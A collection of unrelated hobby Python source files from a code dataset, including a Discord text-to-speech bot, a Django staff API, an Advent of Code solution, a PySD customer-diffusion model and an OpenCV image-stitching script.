r.iter_content(chunk_size=1024*1024):\n if chunk:\n f.write(chunk)\n else:\n return None\n return path\n\nclass Voice(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.vozSelected = \"Isabela\"\n\n @commands.command(name=\"voz\", aliases=[\"voice\"], description='Comando para selecionar a voz ou listar as vozes disponíveis.')\n async def voiceList(self, ctx: commands.Context, cmd=None, voz=None):\n if cmd == \"list\":\n await ctx.send(voicesString.replace(self.vozSelected, f\"{self.vozSelected} - Selecionado\"))\n elif cmd == \"set\":\n if voz:\n voz = voz.replace(voz[0], voz[0].upper())\n if voz in voicesString:\n self.vozSelected = voz\n await ctx.send(\"Voz alterada com sucesso para: \" + self.vozSelected)\n else:\n await ctx.send(\"Erro, verifique se inseriu a voz certa (!vozes set [voz desejada]), \"\n +\"use !voz list para listar as vozes disponíveis.\")\n else:\n await ctx.send(\"Que? Usa-se assim: !voz [list ou set]. O comando para falar é \\\"!falar [frase (entre aspas)]\\\"\")\n \n\n @commands.command(name='falar', aliases=[\"say\", \"dizer\"],description='Toca audio text-to-speech')\n async def voice(self, ctx: commands.Context, *content):\n try:\n\n if content[0] == \"-a\":\n anon = True\n content = tuple(x for x in content if x != \"-a\")\n else:\n anon = False\n\n channel = ctx.message.author.voice.channel\n path = getVoice(\" \".join(content), voz=self.vozSelected)\n\n if path:\n if anon:\n await ctx.message.delete()\n\n vc = await channel.connect()\n player = vc.play(discord.FFmpegPCMAudio(path), after=lambda e: print('done', e))\n\n while vc.is_playing():\n await asyncio.sleep(1)\n\n vc.stop()\n await vc.disconnect()\n os.remove(path)\n else:\n await ctx.send(\"Um erro aconteceu ao processar o áudio, verifique os logs.\")\n\n except AttributeError as e:\n await ctx.send(\"Você não está em um canal de voz.\", e)\n\ndef setup(bot):\n bot.add_cog(Voice(bot))\n\nif __name__ == \"__main__\":\n print(getVoice(\"Isto aqui e um teste.\"))","repo_name":"vinists/Botinho","sub_path":"Botinho/cogs/voice.py","file_name":"voice.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27341144984","text":"from django.http import JsonResponse\r\nfrom rest_framework.views import APIView\r\n\r\nfrom staff.models import Staff\r\nfrom staff.serializer import StaffSerializer\r\n\r\nfrom rest_framework.permissions import IsAuthenticated\r\n\r\nclass StaffList(APIView):\r\n\r\n permission_classes = [IsAuthenticated]\r\n \r\n def get(self, request):\r\n \r\n staffObj = Staff.objects\r\n \r\n staffSerializer = StaffSerializer(staffObj, many=True)\r\n \r\n return JsonResponse({\r\n \"error\": False,\r\n \"data\": staffSerializer.data,\r\n \"message\": \"Get data successfully\"\r\n })\r\n\r\n def post(self, request):\r\n \r\n body = request.data \r\n \r\n staffSerializer = StaffSerializer(data={\r\n \"name\": body['name'],\r\n \"nip\": body['nip'],\r\n \"phone\": body['phone'],\r\n \"email\": body['email'],\r\n \"role\": body['role'],\r\n \"address\": body['address']\r\n\r\n })\r\n \r\n if staffSerializer.is_valid():\r\n\r\n staffSerializer.save()\r\n \r\n return JsonResponse({\r\n \"error\": False,\r\n \"data\": staffSerializer.data,\r\n \"message\": \"Data saved successfully\"\r\n })\r\n \r\n else:\r\n \r\n return JsonResponse({\r\n \"error\": True,\r\n \"data\": None,\r\n \"message\": staffSerializer.errors\r\n })\r\n\r\nclass StaffDetail(APIView):\r\n \r\n def get(self, request, id):\r\n \r\n staffObj = Staff.objects.filter(id=id).first()\r\n \r\n staffSerializer = StaffSerializer(staffObj)\r\n \r\n return JsonResponse({\r\n \"error\": False,\r\n \"data\": staffSerializer.data\r\n })\r\n \r\n def put(self, request, id):\r\n \r\n body = request.data \r\n \r\n staffObj = Staff.objects.filter(id=id).first()\r\n \r\n staffSerializer = StaffSerializer(staffObj, data={\r\n \"name\": body['name'],\r\n \"nip\": body['nip'],\r\n \"phone\": body['phone'],\r\n \"email\": body['email'],\r\n \"role\": body['role'],\r\n \"address\": body['address']\r\n })\r\n \r\n if staffSerializer.is_valid():\r\n staffSerializer.save()\r\n \r\n return JsonResponse({\r\n \"error\": False,\r\n \"data\": staffSerializer.data,\r\n \"message\": \"Data updated successfully\"\r\n })\r\n \r\n else :\r\n return JsonResponse({\r\n \"data\": None,\r\n \"error\": True,\r\n \"message\": staffSerializer.errors\r\n })\r\n \r\n def delete(self, request, id):\r\n \r\n staffObject = Staff.objects.filter(id=id)\r\n \r\n staffObject.delete()\r\n \r\n return JsonResponse({\r\n \"error\": False,\r\n \"data\": None,\r\n \"message\": \"Data deleted successfully\"\r\n })","repo_name":"indrascl/projectInventory","sub_path":"inventoryproject/staff/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"17586545851","text":"from matplotlib.mlab import psd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport spectrum as sp\nimport filters\nimport preprocessing as pp\n\n\ndef verif_psd(sig_type):\n file_ids = ['0001', '0193']\n time_windows = [(960, 1260), (299, 599)]\n all_p = []\n all_f = []\n for file_id in file_ids:\n raw_t, raw_hr, t, hr = pp.one_patient_sig(file_id, sig_type)\n for time_window in time_windows:\n print(str(t[time_window[0]]) + '-' + str(t[time_window[1]]))\n p, f = psd(raw_hr[time_window[0]:time_window[1]], NFFT=300, detrend='mean')\n all_p.append(p)\n all_f.append(f)\n plt.figure()\n plt.plot(f, p)\n plt.title(file_id + ' : ' + str(time_window[0]) + '-' + str(time_window[1]))\n return all_f, all_p\n\n\nraw_t, raw_hr, t, hr = pp.patient_sig('0012')\n#t, hr = t[8720:9140], hr[8720:9140]\n\n#ibi = 1/hr\n\n#sig = sp.data_cosine(N=1024, A=0.1, sampling=1024, freq=200) + sp.data_cosine(N=1024, A=0.1, sampling=1024, freq=150)\n\n\n#pxx1, f1 = psd(raw_hr, NFFT=4096)\n#pxx2, f2 = psd(raw_hr, NFFT=4096, detrend='mean')\n\n#w = sp.Window(120, 'hann')\np = sp.WelchPeriodogram(raw_hr[0:300], NFFT=300)\n#p.run()\n\n#p.plot()\n#plt.plot(p[0][1], 10*np.log10(p[0][0]))\n#plt.plot(f1, 10*np.log10(pxx1), label='no detrend')\n#plt.plot(f2, 10*np.log10(pxx2), label='mean detrend')\n\n#plt.legend()\n\n","repo_name":"dperez96/projet_gabi","sub_path":"tests_psd.py","file_name":"tests_psd.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3143626497","text":"from time import perf_counter\n\n\ndirs = {\"L\": (-1, 0), \"R\": (1, 0), \"U\": (0, 1), \"D\": (0, -1)}\n\n\ndef manhatDist(p1, p2):\n return sum(abs(c1 - c2) for c1, c2 in zip(p1, p2))\n\n\ndef moveTail(head, tail):\n if (any(h == t for h, t in zip(head, tail)) and max(abs(h - t) for h, t in zip(head, tail)) == 2) or manhatDist(head, tail) >= 3:\n diff = [((h - t) // abs(h - t)) if h - t != 0 else 0 for h, t in zip(head, tail)]\n return [c1 + c2 for c1, c2 in zip(tail, diff)]\n else:\n return tail\n\n\ndef main(verbose):\n with open(\"input.txt\", encoding=\"UTF-8\") as f:\n lines = [line.strip('\\n') for line in f.readlines()]\n\n head = [0, 0]\n tail = [0, 0]\n tailVisits = set()\n\n for line in lines:\n d, amt = line.split(' ')\n d = dirs[d]\n amt = int(amt)\n\n while amt > 0:\n head = [p + o for p, o in zip(head, d)]\n\n tailVisits.add(tuple(tail))\n tail = moveTail(head, tail)\n\n amt -= 1\n\n tailVisits.add(tuple(tail))\n part1 = len(tailVisits)\n\n tails = [[0, 0] for _ in range(10)]\n tailVisits = set()\n\n for line in lines:\n d, amt = line.split(' ')\n d = dirs[d]\n amt = int(amt)\n\n while amt > 0:\n tails[0] = [t + o for t, o in zip(tails[0], d)]\n\n tailVisits.add(tuple(tails[-1]))\n for i in range(1, 10):\n tails[i] = moveTail(tails[i - 1], tails[i])\n\n amt -= 1\n\n tailVisits.add(tuple(tail))\n\n if verbose:\n print(f\"\\nPart 1:\\nNumber of positions visited by tail of rope: {part1}\\n\\nPart 2:\\nNumber of positions visited by tail of rope: {len(tailVisits)}\")\n\n return [part1, len(tailVisits)]\n\n\nif __name__ == \"__main__\":\n init_time = perf_counter()\n main(True)\n print(f\"\\nRan in {perf_counter() - init_time} seconds.\")","repo_name":"brandonhippe/Advent-of-Code","sub_path":"2022/9/9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70238359814","text":"'''\nA palindromic number reads the same both ways.\nThe smallest 6 digit palindrome made from the product\nof two 3-digit numbers is\n\n101101 = 143 * 707\n\nFind the largest palindrome made from the product of\ntwo 3-digit numbers which is less than `N`\n'''\n\nn = 100000\ni = 100\npairs = []\n\nwhile i <= (n // i):\n if n % i == 0:\n pairs.append((i, n // i))\n i += 1\n\n\nm = (0, 0)\nfor p in pairs:\n if abs(p[0] - p[1]) > abs(m[0] - m[1]):\n m = p\nprint(m)\n","repo_name":"kaizer1v/py-exercises","sub_path":"4_largest_palindrome.py","file_name":"4_largest_palindrome.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"28100488860","text":"\"\"\"\nPython model 'bass.py'\nTranslated using PySD\n\"\"\"\n\nfrom pathlib import Path\n\nfrom pysd.py_backend.statefuls import Integ\n\n__pysd_version__ = \"2.2.1\"\n\n__data = {\"scope\": None, \"time\": lambda: 0}\n\n_root = Path(__file__).parent\n\n_subscript_dict = {}\n\n_namespace = {\n \"TIME\": \"time\",\n \"FINAL TIME\": \"final_time\",\n \"INITIAL TIME\": \"initial_time\",\n \"SAVEPER\": \"saveper\",\n \"TIME STEP\": \"time_step\",\n \"Time\": \"time\",\n\n \"Our Customers\": \"our_customers\",\n \"Potential Customers\": \"potential_customers\",\n \"Competitor Customers\": \"competitor_customers\",\n\n \"New Customers\": \"our_gain\",\n \"New Potential Customers\": \"potential_gain\",\n \"New Competitor Customers\": \"competitor_gain\",\n\n \"Potential Customers -> Our Customers\": \"potential2our\",\n \"Potential Customers -> Competitor Customers\": \"potential2competitor\",\n \"Our Customers -> Potential Customers\": \"our2potential\",\n \"Competitor Customers -> Potential Customers\": \"competitor2potential\",\n \"Our Customers -> Competitor Customers\": \"our2competitor\",\n \"Competitor Customers -> Our Customers\": \"competitor2our\",\n \"Demand from Marketing\": \"marketing_demand\",\n \"Concentration of Potential Customers\": \"potential_customers_concentration\",\n \"Total population (actual)\": \"total_market\",\n\n \"P11\": \"p11\",\n \"P13\": \"p13\",\n \"P21\": \"p21\",\n \"P23\": \"p23\",\n \"Word of Mouth impact\": \"efficiency_word_of_mouth\",\n \"Marketing impact\": \"efficiency_marketing\",\n \"Rate\": \"sociability\",\n \"Share of Dissatisfied\": \"k\",\n \"Luring Threshold\": \"tr\"\n}\n\n_dependencies = {\n \"final_time\": {},\n \"initial_time\": {},\n \"saveper\": {\"time_step\": 1},\n \"time_step\": {},\n\n \"our_customers\": {\"_integ_our_customers\": 1},\n \"potential_customers\": {\"_integ_potential_customers\": 1},\n \"competitor_customers\": {\"_integ_competitor_customers\": 1},\n\n \"_integ_our_customers\": {\"initial\": {}, \"step\": {\"our_gain\": 1}},\n \"_integ_potential_customers\": {\"initial\": {}, \"step\": {\"potential_gain\": 1}},\n \"_integ_competitor_customers\": {\"initial\": {}, \"step\": {\"competitor_gain\": 1}},\n\n \"our_gain\": {\n \"potential2our\": 1,\n \"competitor2our\": 1,\n \"our2potential\": 1,\n \"our2competitor\": 1\n },\n \"potential_gain\": {\n \"our2potential\": 1,\n \"competitor2potential\": 1,\n \"potential2our\": 1,\n \"potential2competitor\": 1\n },\n \"competitor_gain\": {\n \"potential2competitor\": 1,\n \"our2competitor\": 1,\n \"competitor2potential\": 1,\n \"competitor2our\": 1\n },\n\n \"potential2our\": {\n \"our_customers\": 1,\n \"p11\": 1,\n \"sociability\": 1,\n \"potential_customers_concentration\": 1,\n \"efficiency_word_of_mouth\": 1,\n \"marketing_demand\": 1\n },\n \"potential2competitor\": {\n \"competitor_customers\": 1,\n \"p21\": 1,\n \"sociability\": 1,\n \"potential_customers_concentration\": 1,\n \"efficiency_word_of_mouth\": 1,\n \"marketing_demand\": 1\n\n },\n \"our2potential\": {\n \"our_customers\": 1,\n \"p13\": 1,\n \"k\": 1\n },\n \"competitor2potential\": {\n \"competitor_customers\": 1,\n \"p23\": 1,\n \"k\": 1\n },\n \"our2competitor\": {\n \"tr\": 1,\n \"efficiency_word_of_mouth\": 1,\n \"sociability\": 1,\n \"competitor_customers\": 1,\n \"p21\": 1,\n \"our_customers\": 1,\n \"p11\": 1,\n \"k\": 1,\n \"p13\": 1,\n \"total_market\": 1\n },\n \"competitor2our\": {\n \"tr\": 1,\n \"efficiency_word_of_mouth\": 1,\n \"sociability\": 1,\n \"our_customers\": 1,\n \"p11\": 1,\n \"competitor_customers\": 1,\n \"p21\": 1,\n \"k\": 1,\n \"p23\": 1,\n \"total_market\": 1\n },\n \"marketing_demand\": {\n \"efficiency_marketing\": 1,\n \"potential_customers\": 1\n },\n \"potential_customers_concentration\": {\n \"potential_customers\": 1,\n \"total_market\": 1\n },\n \"total_market\": {\n \"our_customers\": 1,\n \"potential_customers\": 1,\n \"competitor_customers\": 1\n },\n\n \"p11\": {},\n \"p13\": {},\n \"p21\": {},\n \"p23\": {},\n \"efficiency_word_of_mouth\": {},\n \"efficiency_marketing\": {},\n \"sociability\": {},\n \"k\": {\n \"efficiency_marketing\": 1,\n \"efficiency_word_of_mouth\": 1\n },\n \"tr\": {\n \"efficiency_word_of_mouth\": 1,\n \"efficiency_marketing\": 1\n },\n}\n\n##########################################################################\n# CONTROL VARIABLES #\n##########################################################################\n\n_control_vars = {\n \"initial_time\": lambda: 0,\n \"final_time\": lambda: final_time(),\n \"time_step\": lambda: 1,\n \"saveper\": lambda: time_step(),\n}\n\n\ndef _init_outer_references(data):\n for key in data:\n __data[key] = data[key]\n\n\ndef time():\n return __data[\"time\"]()\n\n\ndef final_time():\n \"\"\"\n Real Name: FINAL TIME\n Original Eqn: 100\n Units: Month\n Limits: (None, None)\n Type: constant\n Subs: None\n\n The final time for the simulation.\n \"\"\"\n return __data[\"time\"].final_time()\n\n\ndef initial_time():\n \"\"\"\n Real Name: INITIAL TIME\n Original Eqn: 0\n Units: Month\n Limits: (None, None)\n Type: constant\n Subs: None\n\n The initial time for the simulation.\n \"\"\"\n return __data[\"time\"].initial_time()\n\n\ndef saveper():\n \"\"\"\n Real Name: SAVEPER\n Original Eqn: TIME STEP\n Units: Month\n Limits: (None, None)\n Type: component\n Subs: None\n\n The frequency with which output is stored.\n \"\"\"\n return __data[\"time\"].saveper()\n\n\ndef time_step():\n \"\"\"\n Real Name: TIME STEP\n Original Eqn: 1\n Units: Month\n Limits: (None, None)\n Type: constant\n Subs: None\n\n The time step for the simulation.\n \"\"\"\n return __data[\"time\"].time_step()\n\n\n##########################################################################\n# MODEL VARIABLES #\n##########################################################################\n\ndef our_customers():\n \"\"\"\n Real Name: Our Customers\n Original Eqn: INTEG(-our gain, 0)\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return _integ_our_customers()\n\n\ndef potential_customers():\n \"\"\"\n Real Name: Potential Customers\n Original Eqn: INTEG(-potential gain, 10e05)\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return _integ_potential_customers()\n\n\ndef competitor_customers():\n \"\"\"\n Real Name: Competitor Customers\n Original Eqn: INTEG(-competitor gain, 0)\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return _integ_competitor_customers()\n\n\n_integ_our_customers = Integ(lambda: our_gain(), lambda: 0, \"_integ_customers\")\n\n\n_integ_potential_customers = Integ(lambda: potential_gain(), lambda: 1e05, \"_integ_potential_customers\")\n\n\n_integ_competitor_customers = Integ(lambda: competitor_gain(), lambda: 0, \"_integ_customers\")\n\n\ndef our_gain():\n \"\"\"\n Real Name: New Customers\n Original Eqn: potential2our + competitor2our + our2potential + our2competitor \n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return potential2our() + competitor2our() - our2potential() - our2competitor() \n\n\ndef potential_gain():\n \"\"\"\n Real Name: New Potential Customers\n Original Eqn: our2potential + competitor2potential + potential2our + potential2competitor \n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return our2potential() + competitor2potential() - potential2our() - potential2competitor()\n\n\ndef competitor_gain():\n \"\"\"\n Real Name: New Competitor Customers\n Original Eqn: potential2competitor + our2competitor + competitor2potential + competitor2our \n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return potential2competitor() + our2competitor() - competitor2potential() - competitor2our()\n\n\ndef potential2our():\n \"\"\"\n Real Name: Potential Customers -> Our Customers\n Original Eqn: marketing_demand + (efficiency_wom * rate * potential_customers * our_customers * p11) / total_market\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n satisfied_customers = our_customers() * p11()\n contacts_with_customers = satisfied_customers * sociability()\n contacts_of_noncustomers_with_customers = contacts_with_customers * potential_customers_concentration()\n word_of_mouth_demand = efficiency_word_of_mouth() * contacts_of_noncustomers_with_customers\n return marketing_demand() + word_of_mouth_demand\n\n\ndef potential2competitor():\n \"\"\"\n Real Name: Potential Customers -> Competitor Customers\n Original Eqn: marketing_demand + (efficiency_wom * rate * potential_customers * competitor_customers * p21) / total_market\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n satisfied_customers = competitor_customers() * p21()\n contacts_with_customers = satisfied_customers * sociability()\n contacts_of_noncustomers_with_customers = contacts_with_customers * potential_customers_concentration()\n word_of_mouth_demand = efficiency_word_of_mouth() * contacts_of_noncustomers_with_customers\n return marketing_demand() + word_of_mouth_demand\n\n\ndef our2potential():\n \"\"\"\n Real Name: Our Customers -> Potential Customers\n Original Eqn: our_customers * p13 * share_dissatisfied\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return our_customers() * p13() * k()\n\n\ndef competitor2potential():\n \"\"\"\n Real Name: Competitor Customers -> Potential Customers\n Original Eqn: competitor_customers * p23 * share_dissatisfied\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return competitor_customers() * p23() * k()\n\n\ndef our2competitor():\n \"\"\"\n Real Name: Our Customers -> Competitor Customers\n Original Eqn: luring_threshold * efficiency_word_of_mouth * rate * competitor_customers * p21 * our_customers * (1 - p11 - share_dissatisfied * p13) / total_market\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return tr() * efficiency_word_of_mouth() * sociability() * competitor_customers() * p21() * our_customers() * (1 - p11() - k() * p13()) / total_market()\n\n\ndef competitor2our():\n \"\"\"\n Real Name: Competitor Customers -> Our Customers\n Original Eqn: luring_threshold * efficiency_word_of_mouth * rate * competitor_customers * p11 * our_customers * (1 - p21 - share_dissatisfied * p23) / total_market\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return tr() * efficiency_word_of_mouth() * sociability() * our_customers() * p11() * competitor_customers() * (1 - p21() - k() * p23()) / total_market()\n\n\ndef marketing_demand():\n \"\"\"\n Real Name: Demand from Marketing\n Original Eqn: Efficiency Marketing / Potential Customers\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return efficiency_marketing() * potential_customers()\n\n\ndef potential_customers_concentration():\n \"\"\"\n Real Name: Concentration of Potential Customers\n Original Eqn: Potential Customers / Total Market\n Units: float\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return potential_customers() / total_market()\n\n\ndef total_market():\n \"\"\"\n Real Name: Total population (actual)\n Original Eqn: Our Customers + Potential Customers + Competitor Customers\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return our_customers() + potential_customers() + competitor_customers()\n\n\ndef p11():\n \"\"\"\n Real Name: P11\n Original Eqn: 0.5\n Units: float\n Limits: (None, None)\n Type: constant\n Subs: None\n\n\n \"\"\"\n return 0.5\n\n\ndef p13():\n \"\"\"\n Real Name: P13\n Original Eqn: 0.5\n Units: float\n Limits: (None, None)\n Type: constant\n Subs: None\n\n\n \"\"\"\n return 0.5\n\n\ndef p21():\n \"\"\"\n Real Name: P21\n Original Eqn: 0.5\n Units: float\n Limits: (None, None)\n Type: constant\n Subs: None\n\n\n \"\"\"\n return 0.5\n\n\ndef p23():\n \"\"\"\n Real Name: P23\n Original Eqn: 0.5\n Units: float\n Limits: (None, None)\n Type: constant\n Subs: None\n\n\n \"\"\"\n return 0.5\n\n\ndef efficiency_word_of_mouth():\n \"\"\"\n Real Name: Word of Mouth impact\n Original Eqn: 0.011\n Units: person / contact\n Limits: (None, None)\n Type: constant\n Subs: None\n\n\n \"\"\"\n return 0.015\n\n\ndef efficiency_marketing():\n \"\"\"\n Real Name: Marketing impact\n Original Eqn: 0.015\n Units: person / contact\n Limits: (None, None)\n Type: constant\n Subs: None\n\n\n \"\"\"\n return 0.011\n\n\ndef final_time():\n \"\"\"\n Real Name: FINAL TIME\n Original Eqn: 100\n Units: int\n Limits: (None, None)\n Type: constant\n Subs: None\n\n\n \"\"\"\n return 100\n\n\ndef sociability():\n \"\"\"\n Real Name: Rate\n Original Eqn: 100\n Units: contact / person / Month\n Limits: (None, None)\n Type: constant\n Subs: None\n\n\n \"\"\"\n return 100\n\n\ndef k():\n \"\"\"\n Real Name: Share of Dissatisfied\n Original Eqn: Market_impact / (WoM_impact + Market_impact)\n Units: float\n Limits: (None, None)\n Type: constant\n Subs: None\n\n\n \"\"\"\n return efficiency_marketing() / (efficiency_marketing() + efficiency_word_of_mouth())\n\n\ndef tr():\n \"\"\"\n Real Name: Share of Dissatisfied\n Original Eqn: WoM_impact / (WoM_impact + Market_impact)\n Units: float\n Limits: (None, None)\n Type: constant\n Subs: None\n \"\"\"\n return efficiency_word_of_mouth() / (efficiency_marketing() + efficiency_word_of_mouth())\n","repo_name":"DanisAlukaev/Simulation-Modelling","sub_path":"Assignment 2/bass.py","file_name":"bass.py","file_ext":"py","file_size_in_byte":13959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6794709696","text":"import numpy as np\nimport cv2\nMIN_MATCH_COUNT = 10\n\nimg1 = cv2.imread('im1.jpg',0) # queryImage\nimg2 = cv2.imread('im2.jpg',0) # trainImage\n\n# Initiate SIFT detector\nsift = cv2.SIFT()\n\n# find the keypoints and descriptors with SIFT\nkp1, des1 = sift.detectAndCompute(img1,None)\nkp2, des2 = sift.detectAndCompute(img2,None)\n\nFLANN_INDEX_KDTREE = 0\nindex_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\nsearch_params = dict(checks = 50)\n\nflann = cv2.FlannBasedMatcher(index_params, search_params)\n\nmatches = flann.knnMatch(des2,des1,k=2)\n\nh1, w1 = img1.shape[:2]\nh2, w2 = img2.shape[:2]\n# store all the good matches as per Lowe's ratio test.\ngood = []\nfor m,n in matches:\n if m.distance < 1*n.distance:\n good.append(m)\n\nif len(good)>MIN_MATCH_COUNT:\n src_pts = np.float32([ kp2[m.queryIdx].pt for m in good ]).reshape(-1,1,2)\n dst_pts = np.float32([ kp1[m.trainIdx].pt for m in good ]).reshape(-1,1,2)\n\n M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC,5.0)\n matchesMask = mask.ravel().tolist()\n\nelse:\n print (\"Not enough matches are found - %d/%d\" %(len(good), MIN_MATCH_COUNT))\n matchesMask = None\n\n\n\n\nif matchesMask:\n # Initialize a matrix to include all the coordinates in the image, from (0, 0), (1, 0), ..., to (w-1, h-1)\n # In this way, you do not need loops to access every pixel\n c = np.zeros((3, h2*w2), dtype=np.int)\n for y in range(h2):\n c[:, y*w2:(y+1)*w2] = np.matrix([np.arange(w2), [y] * w2, [1] * w2])\n\n # Calculate the new image coordinates. Note that the third row needs to be normalized to 1\n # M is the homography matrix\n new_c = M * np.matrix(c)\n new_c = np.around(np.divide(new_c, new_c[2]))\n\n # The new coordinates may have negative values. Perform translation if needed\n x_min = np.amin(new_c[0])\n y_min = np.amin(new_c[1])\n x_max = np.amax(new_c[0])\n y_max = np.amax(new_c[1])\n if x_min < 0:\n t_x = -x_min\n else:\n t_x = 0\n if y_min < 0:\n t_y = -y_min\n else:\n t_y = 0\n\n # Initialize the final images to include every pixel of the stitched images \n new_w = np.maximum(x_max, w1) - np.minimum(x_min, 0) + 1\n new_h = np.maximum(y_max, h1) - np.minimum(y_min, 0) + 1\n new_img1 = np.zeros((new_h, new_w), dtype=np.uint8)\n new_img2 = np.zeros((new_h, new_w), dtype=np.uint8)\n\n # Assign the first image\n new_img1[t_y:t_y+h1, t_x:t_x+w1] = img1\n\n # Assign the second image based on the newly calculated coordinates\n for idx in range(c.shape[1]):\n x = c[0, idx]\n y = c[1, idx]\n x_c = new_c[0, idx]\n y_c = new_c[1, idx]\n new_img2[y_c + t_y, x_c + t_x] = img2[y, x]\n\n # The stitched image can be simply obtained by averaging the two final images\n new_img = (new_img1 + new_img2) / 2\n\n cv2.imshow(\"Stitched Image\", new_img)\n cv2.waitKey()\n cv2.destroyAllWindows()\n","repo_name":"michaelyeg/cmput206lab2016-sample","sub_path":"lab06/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3762200158","text":"import os\nfrom collections import namedtuple\nimport numpy as np\nfrom alib import solutions, util\n\ntry:\n import cPickle as pickle\nexcept ImportError:\n import pickle\n\nfrom vnep_approx import vine, treewidth_model\n\nREQUIRED_FOR_PICKLE = solutions # this prevents pycharm from removing this import, which is required for unpickling solutions\n\nReducedOfflineViNEResultCollection = namedtuple(\n \"ReducedOfflineViNEResultCollection\",\n [\n \"total_runtime\", # AggregatedData\n \"profit\", # AggregatedData\n \"runtime_per_request\", # AggregatedData\n \"num_initial_lp_failed\", # sum across repetitions\n \"num_node_mapping_failed\", # sum across repetitions\n \"num_edge_mapping_failed\", # sum across repetitions\n \"original_number_requests\",\n \"num_req_with_profit\",\n \"max_node_load\", # AggregatedData\n \"max_edge_load\", # AggregatedData\n ],\n)\n\nReducedRandRoundSepLPOptDynVMPCollectionResult = namedtuple(\n \"ReducedRandRoundSepLPOptDynVMPCollectionResult\",\n [\n \"lp_time_preprocess\",\n \"lp_time_tree_decomposition\",\n \"lp_time_dynvmp_initialization\",\n \"lp_time_dynvmp_computation\",\n \"lp_time_gurobi_optimization\",\n \"lp_time_optimization\",\n \"lp_status\",\n \"lp_profit\",\n \"lp_generated_columns\",\n \"max_node_loads\",\n \"max_edge_loads\",\n \"rounding_runtimes\",\n \"profits\"\n ],\n)\n\nAggregatedData = namedtuple(\n \"AggregatedData\",\n [\n \"min\",\n \"mean\",\n \"max\",\n \"std_dev\",\n \"value_count\"\n ]\n)\n\n\ndef get_aggregated_data(list_of_values):\n _min = np.min(list_of_values)\n _mean = np.mean(list_of_values)\n _max = np.max(list_of_values)\n _std_dev = np.std(list_of_values)\n _value_count = len(list_of_values)\n return AggregatedData(min=_min,\n max=_max,\n mean=_mean,\n std_dev=_std_dev,\n value_count=_value_count)\n\n\nlogger = util.get_logger(__name__, make_file=False, propagate=True)\n\n\nclass OfflineViNEResultCollectionReducer(object):\n\n def __init__(self):\n pass\n\n def reduce_vine_result_collection(self, baseline_solutions_input_pickle_name,\n reduced_baseline_solutions_output_pickle_name=None):\n\n baseline_solutions_input_pickle_path = os.path.join(\n util.ExperimentPathHandler.INPUT_DIR,\n baseline_solutions_input_pickle_name\n )\n\n if reduced_baseline_solutions_output_pickle_name is None:\n file_basename = os.path.basename(baseline_solutions_input_pickle_path).split(\".\")[0]\n reduced_baseline_solutions_output_pickle_path = os.path.join(util.ExperimentPathHandler.OUTPUT_DIR,\n file_basename + \"_reduced.pickle\")\n else:\n reduced_baseline_solutions_output_pickle_path = os.path.join(util.ExperimentPathHandler.OUTPUT_DIR,\n baseline_solutions_input_pickle_name)\n\n logger.info(\"\\nWill read from ..\\n\\t{} \\n\\t\\tand store reduced data into\\n\\t{}\\n\".format(baseline_solutions_input_pickle_path, reduced_baseline_solutions_output_pickle_path))\n\n logger.info(\"Reading pickle file at {}\".format(baseline_solutions_input_pickle_path))\n with open(baseline_solutions_input_pickle_path, \"rb\") as input_file:\n scenario_solution_storage = pickle.load(input_file)\n\n ssd = scenario_solution_storage.algorithm_scenario_solution_dictionary\n ssd_reduced = {}\n for algorithm in ssd.keys():\n logger.info(\".. Reducing results of algorithm {}\".format(algorithm))\n ssd_reduced[algorithm] = {}\n for scenario_id in ssd[algorithm].keys():\n logger.info(\" .. handling scenario {}\".format(scenario_id))\n ssd_reduced[algorithm][scenario_id] = {}\n for exec_id in ssd[algorithm][scenario_id].keys():\n ssd_reduced[algorithm][scenario_id][exec_id] = {}\n params, scenario = scenario_solution_storage.scenario_parameter_container.scenario_triple[scenario_id]\n solution_collection = ssd[algorithm][scenario_id][exec_id].get_solution()\n for vine_settings, result_list in solution_collection.iteritems():\n ssd_reduced[algorithm][scenario_id][exec_id][vine_settings] = []\n number_of_req_profit = 0\n for req in scenario.requests:\n if req.profit > 0.001:\n number_of_req_profit += 1\n number_of_requests = len(scenario.requests)\n\n max_node_load_vals = 